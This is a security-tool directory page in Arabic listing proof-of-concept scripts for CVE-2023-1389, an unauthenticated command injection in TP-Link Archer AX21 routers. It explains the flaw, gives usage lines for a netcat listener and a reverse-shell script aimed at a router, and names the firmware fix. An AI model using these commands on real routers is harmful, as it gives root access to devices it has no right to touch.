Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-1389 — نصوص برهان مفهوم لـ CVE-2023-1389، وهي ثغرة حقن أوامر غير مصادق عليها في أجهزة توجيه TP-Link Archer AX21. تتضمن استغلالات الصدفة العكسية ونقل الملفات عبر معامل country. | Kitploit
أدوات/GitHubGitHub/voyag3r-security/cve-2023-1389
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubvoyag3r-security/cve-2023-1389

CVE-2023-1389

نصوص برهان مفهوم لـ CVE-2023-1389، وهي ثغرة حقن أوامر غير مصادق عليها في أجهزة توجيه TP-Link Archer AX21. تتضمن استغلالات الصدفة العكسية ونقل الملفات عبر معامل country.

عرض المستودع
177منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الوصف

CVE-2023–1389 هي ثغرة حقن أوامر غير موثقة (Unauthenticated Command Injection) في جهاز التوجيه TP-Link Archer AX21 WiFi. يستخدم استدعاء (callback) في معامل country دالة popen()، والتي تعمل بصلاحيات الجذر (root)، مما يسمح للمهاجم بحقن قيم عشوائية من خلال طلبات GET أو POST إلى واجهة الإدارة، دون الحاجة إلى المصادقة. يمكن العثور على مزيد من التفاصيل حول الثغرة هنا.

هذه بعض إثباتات المفهوم (Proof-of-Concepts) التي أنشأتها أثناء استكشاف حقن الأوامر. كان Archer-file-transfer.py هو الإصدار الأول، وهو معقد إلى حد ما في كيفية تحقيق التفاعل. يمنحك Archer-rev-shell.py شيل عكسي بسيط باستخدام netcat، وهو على الأرجح ما تبحث عنه. إذا كنت ترغب في معرفة المزيد عن تطوير هذه السكريبتات، يمكنك قراءة المقال هنا.

الاستخدام

في نافذة طرفية واحدة:

root@kitploit:~
nc your_IP listener_port

في نافذة طرفية ثانية:

root@kitploit:~
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port

التخفيف

أصدرت TP-Link إصدار البرنامج الثابت (firmware) 1.1.4 Build 20230219 والذي يعالج المشكلة عن طريق إزالة الاستدعاء الضعيف. تحديث جهاز التوجيه إلى أحدث إصدار من البرنامج الثابت يجب أن يحمي جهازك.

المستقبل

من المحتمل ألا أحافظ على هذه الإثباتات (PoCs). كلاهما بسيط للغاية ويجب أن يكون من السهل تعديلهما حسب الحاجة.

تنزيل الأداة